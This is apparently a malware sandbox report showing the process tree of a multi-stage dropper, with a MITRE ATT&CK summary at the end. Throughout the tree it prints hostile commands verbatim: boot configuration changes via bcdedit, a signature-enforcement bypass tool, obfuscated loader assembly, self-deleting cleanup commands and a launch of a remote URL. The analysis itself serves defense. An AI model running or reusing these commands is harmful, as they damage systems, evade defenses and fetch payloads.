C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}13⤵
- Modifies boot configuration data using bcdedit
PID:10896
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast13⤵
- Modifies boot configuration data using bcdedit
PID:10960
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 013⤵
- Modifies boot configuration data using bcdedit
PID:11008
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}13⤵
- Modifies boot configuration data using bcdedit
PID:11116
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy13⤵
- Modifies boot configuration data using bcdedit
PID:4156
-
-
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v12⤵
- Modifies boot configuration data using bcdedit
PID:7100
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe12⤵PID:5900
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8EHEQK4GL1\setups.exe"C:\Users\Admin\AppData\Local\Temp\8EHEQK4GL1\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:488 -
C:\Users\Admin\AppData\Local\Temp\is-F9S3F.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-F9S3F.tmp\setups.tmp" /SL5="$40116,427422,192000,C:\Users\Admin\AppData\Local\Temp\8EHEQK4GL1\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3424
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\Documents\JZSeNrBW2SHXmrQOsDhEcB9n.exe"C:\Users\Admin\Documents\JZSeNrBW2SHXmrQOsDhEcB9n.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4996 -
C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4448 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"10⤵PID:6048
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK11⤵
- Delays execution with timeout.exe
PID:2236
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\18346303869.exe" /mix6⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\18346303869.exe"C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\18346303869.exe" /mix7⤵
- Executes dropped EXE
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Users\Admin\AppData\Local\Temp\Skinks.exe"C:\Users\Admin\AppData\Local\Temp\Skinks.exe"8⤵PID:6312
-
C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe"9⤵PID:3884
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"10⤵PID:4120
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CmD < Sospettoso.xlsx10⤵PID:4240
-
C:\Windows\SysWOW64\cmd.exeCmD11⤵PID:6012
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^yZVxJnOtboCOwYACmuqprbTxDxRIXwIZDiDmtkKRJgAQVpuqCvmPrrQHuBQfGyicmDlUxwbhvpmOWrnxhQuACSVAsVaDcxlDitdaYjFBYkzUEwLrevwQZGTHHKCmIUSwYVHRMucwlFCd$" Fermare.xlsx12⤵PID:11732
-
-
C:\Users\Admin\AppData\Roaming\AdikuzPulW\Dimmi.exe.comDimmi.exe.com x12⤵PID:11908
-
C:\Users\Admin\AppData\Roaming\AdikuzPulW\Dimmi.exe.comC:\Users\Admin\AppData\Roaming\AdikuzPulW\Dimmi.exe.com x13⤵PID:11952
-
C:\Users\Admin\AppData\Local\Temp\ljprevijwinj.exe"C:\Users\Admin\AppData\Local\Temp\ljprevijwinj.exe"14⤵PID:9712
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\goqthpf.vbs"14⤵PID:9744
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\leyojulc.vbs"14⤵PID:5140
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 3012⤵
- Runs ping.exe
PID:12012
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\New Feature\6.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\6.exe"9⤵PID:3244
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"10⤵PID:988
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CmD < Veduto.aspx10⤵PID:3040
-
C:\Windows\SysWOW64\cmd.exeCmD11⤵PID:180
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^aTBSeprklsEdUBjaIQPOTdrkjIzkdxVxYGzCSmbkAwUsrqIIuWPCefDwPdGzQRVQvlagiKmozDgScLijqKtxFzsIrsMCTrcIutVTIzBvvGonwL$" Ama.aspx12⤵PID:10804
-
-
C:\Users\Admin\AppData\Roaming\oSXbHZepFnQhkxxrjgN\Allora.exe.comAllora.exe.com S12⤵PID:4136
-
C:\Users\Admin\AppData\Roaming\oSXbHZepFnQhkxxrjgN\Allora.exe.comC:\Users\Admin\AppData\Roaming\oSXbHZepFnQhkxxrjgN\Allora.exe.com S13⤵PID:11176
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\ProgramData\mcmhhkstjtgs & timeout 2 & del /f /q "C:\Users\Admin\AppData\Roaming\oSXbHZepFnQhkxxrjgN\Allora.exe.com"14⤵PID:10964
-
C:\Windows\SysWOW64\timeout.exetimeout 215⤵
- Delays execution with timeout.exe
PID:11168
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\ProgramData\mcmhhkstjtgs & timeout 2 & del /f /q "C:\Users\Admin\AppData\Roaming\oSXbHZepFnQhkxxrjgN\Allora.exe.com"14⤵PID:11132
-
C:\Windows\SysWOW64\timeout.exetimeout 215⤵
- Delays execution with timeout.exe
PID:10996
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 3012⤵
- Runs ping.exe
PID:5964
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe"9⤵PID:1212
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"10⤵PID:4992
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\OMTUbtwmJPo & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\18346303869.exe"8⤵PID:7164
-
C:\Windows\SysWOW64\timeout.exetimeout 39⤵
- Drops file in Windows directory
- Delays execution with timeout.exe
PID:6884
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "JZSeNrBW2SHXmrQOsDhEcB9n.exe" /f & erase "C:\Users\Admin\Documents\JZSeNrBW2SHXmrQOsDhEcB9n.exe" & exit6⤵PID:844
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "JZSeNrBW2SHXmrQOsDhEcB9n.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
-
-
C:\Users\Admin\Documents\xsisRmf9QYcorUoW9aDkaynv.exe"C:\Users\Admin\Documents\xsisRmf9QYcorUoW9aDkaynv.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5628 -
C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe" 0 30603cc16d3187a8.64379538 0 1056⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:6096 -
C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe" 1 3.1616404552.60586048ad874 1057⤵PID:6304
-
C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe" 2 3.1616404552.60586048ad8748⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:5484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ZO3RIL7NLB\setups.exe"C:\Users\Admin\AppData\Local\Temp\ZO3RIL7NLB\setups.exe" ll6⤵
- Executes dropped EXE
PID:5932 -
C:\Users\Admin\AppData\Local\Temp\is-3B7II.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-3B7II.tmp\setups.tmp" /SL5="$80434,427422,192000,C:\Users\Admin\AppData\Local\Temp\ZO3RIL7NLB\setups.exe" ll7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6192
-
-
-
-
C:\Users\Admin\Documents\ao6Cj5ztMuu8mv6NL8w0bG1N.exe"C:\Users\Admin\Documents\ao6Cj5ztMuu8mv6NL8w0bG1N.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5608 -
C:\Users\Admin\Documents\ao6Cj5ztMuu8mv6NL8w0bG1N.exe"C:\Users\Admin\Documents\ao6Cj5ztMuu8mv6NL8w0bG1N.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3340
-
-
-
C:\Users\Admin\Documents\QRTBeTEpQLFpEn8kg1g9vgl7.exe"C:\Users\Admin\Documents\QRTBeTEpQLFpEn8kg1g9vgl7.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5688 -
C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe" 0 30603cc16d3187a8.64379538 0 1056⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe" 1 3.1616404552.60586048a6d70 1057⤵PID:4476
-
C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe" 2 3.1616404552.60586048a6d708⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\TWO9O6ZCUU\setups.exe"C:\Users\Admin\AppData\Local\Temp\TWO9O6ZCUU\setups.exe" ll6⤵
- Executes dropped EXE
PID:3128 -
C:\Users\Admin\AppData\Local\Temp\is-N65NB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-N65NB.tmp\setups.tmp" /SL5="$30436,427422,192000,C:\Users\Admin\AppData\Local\Temp\TWO9O6ZCUU\setups.exe" ll7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5052
-
-
-
-
C:\Users\Admin\Documents\FxfTx8erfPX6fyGtW3PtDbgN.exe"C:\Users\Admin\Documents\FxfTx8erfPX6fyGtW3PtDbgN.exe"5⤵
- Executes dropped EXE
PID:5640
-
-
C:\Users\Admin\Documents\VbK9YfyeRvt8rDnUGnSrmaN1.exe"C:\Users\Admin\Documents\VbK9YfyeRvt8rDnUGnSrmaN1.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4244 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im VbK9YfyeRvt8rDnUGnSrmaN1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\VbK9YfyeRvt8rDnUGnSrmaN1.exe" & del C:\ProgramData\*.dll & exit6⤵PID:5328
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im VbK9YfyeRvt8rDnUGnSrmaN1.exe /f7⤵
- Kills process with taskkill
PID:5652
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:5584
-
-
-
-
C:\Users\Admin\Documents\OTv1aoIKsmaXSh1jpUZgH0XD.exe"C:\Users\Admin\Documents\OTv1aoIKsmaXSh1jpUZgH0XD.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:408 -
C:\ProgramData\532568.5"C:\ProgramData\532568.5"6⤵
- Executes dropped EXE
PID:1304
-
-
C:\ProgramData\218944.2"C:\ProgramData\218944.2"6⤵
- Executes dropped EXE
PID:6016 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:5800
-
-
-
-
C:\Users\Admin\Documents\6sUPec57VI5dpryixwk9LfT3.exe"C:\Users\Admin\Documents\6sUPec57VI5dpryixwk9LfT3.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Users\Admin\Documents\1dqKDXdM3UJScuo9hogG4Vho.exe"C:\Users\Admin\Documents\1dqKDXdM3UJScuo9hogG4Vho.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5220 -
C:\Users\Admin\AppData\Local\Temp\S7XTGAML67\setups.exe"C:\Users\Admin\AppData\Local\Temp\S7XTGAML67\setups.exe" ll6⤵PID:6932
-
C:\Users\Admin\AppData\Local\Temp\is-69EL5.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-69EL5.tmp\setups.tmp" /SL5="$40526,427422,192000,C:\Users\Admin\AppData\Local\Temp\S7XTGAML67\setups.exe" ll7⤵
- Loads dropped DLL
PID:7048
-
-
-
C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe" 0 30603cc16d3187a8.64379538 0 1056⤵PID:6884
-
C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe" 1 3.1616404552.605860487b8d4 1057⤵
- Adds Run key to start application
PID:200 -
C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe" 2 3.1616404552.605860487b8d48⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:6244
-
-
-
-
-
C:\Users\Admin\Documents\qeGMdNFSYbt9qljVPOXfGHbY.exe"C:\Users\Admin\Documents\qeGMdNFSYbt9qljVPOXfGHbY.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2580 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im qeGMdNFSYbt9qljVPOXfGHbY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\qeGMdNFSYbt9qljVPOXfGHbY.exe" & del C:\ProgramData\*.dll & exit6⤵PID:6348
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im qeGMdNFSYbt9qljVPOXfGHbY.exe /f7⤵
- Kills process with taskkill
PID:3784
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:1424
-
-
-
-
C:\Users\Admin\Documents\DsdXQewqsY5YG78RFSKRSEOp.exe"C:\Users\Admin\Documents\DsdXQewqsY5YG78RFSKRSEOp.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5180 -
C:\ProgramData\6948904.76"C:\ProgramData\6948904.76"6⤵
- Executes dropped EXE
PID:6864
-
-
C:\ProgramData\7135769.78"C:\ProgramData\7135769.78"6⤵PID:6924
-
-
-
C:\Users\Admin\Documents\dynboTs5K5sKXUxUcUOJZeiw.exe"C:\Users\Admin\Documents\dynboTs5K5sKXUxUcUOJZeiw.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5216
-
-
C:\Users\Admin\Documents\ZgpxDlNt9WSJXcuF3ihBzWpL.exe"C:\Users\Admin\Documents\ZgpxDlNt9WSJXcuF3ihBzWpL.exe"5⤵
- Executes dropped EXE
PID:4916 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\ZgpxDlNt9WSJXcuF3ihBzWpL.exe"6⤵PID:5200
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:6952
-
-
-
-
C:\Users\Admin\Documents\Ybpwj9zioycMdvwemGxd9rLc.exe"C:\Users\Admin\Documents\Ybpwj9zioycMdvwemGxd9rLc.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5916 -
C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe" 0 30603cc16d3187a8.64379538 0 1056⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:6848 -
C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe" 1 3.1616404552.60586048996f8 1057⤵
- Adds Run key to start application
PID:6000 -
C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe" 2 3.1616404552.60586048996f88⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:5324
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\N42X9YWCVK\setups.exe"C:\Users\Admin\AppData\Local\Temp\N42X9YWCVK\setups.exe" ll6⤵PID:6904
-
-
-
C:\Users\Admin\Documents\QN1ygxdObN4pGb2PLjmBuRxU.exe"C:\Users\Admin\Documents\QN1ygxdObN4pGb2PLjmBuRxU.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2132 -
C:\Users\Admin\Documents\QN1ygxdObN4pGb2PLjmBuRxU.exe"C:\Users\Admin\Documents\QN1ygxdObN4pGb2PLjmBuRxU.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5372
-
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1056
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3952
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4664
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970391⤵PID:5416
-
C:\Users\Admin\AppData\Local\Temp\is-E983N.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-E983N.tmp\{app}\chrome_proxy.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5468
-
C:\Users\Admin\AppData\Local\Temp\is-LFMOV.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-LFMOV.tmp\setups.tmp" /SL5="$40542,427422,192000,C:\Users\Admin\AppData\Local\Temp\N42X9YWCVK\setups.exe" ll1⤵
- Loads dropped DLL
PID:7056
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5972
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5952
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6680 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5244627d-4a8e-1c41-bb2b-9418bc08a11f}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:1004
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6712
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:4892
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6252
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:796
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:6636
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:7380
-
-
C:\Users\Admin\AppData\Local\Temp\E8F0.tmp.exeC:\Users\Admin\AppData\Local\Temp\E8F0.tmp.exe1⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\F881.tmp.exeC:\Users\Admin\AppData\Local\Temp\F881.tmp.exe1⤵PID:4692
-
C:\Users\Admin\AppData\Local\Temp\33.tmp.exeC:\Users\Admin\AppData\Local\Temp\33.tmp.exe1⤵PID:6216
-
C:\Users\Admin\AppData\Local\Temp\871.tmp.exeC:\Users\Admin\AppData\Local\Temp\871.tmp.exe1⤵PID:6616
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6676
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6156
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5956
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7184
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7400
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7516
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7604
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7716
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7880
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Impair Defenses
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
2Web Service
1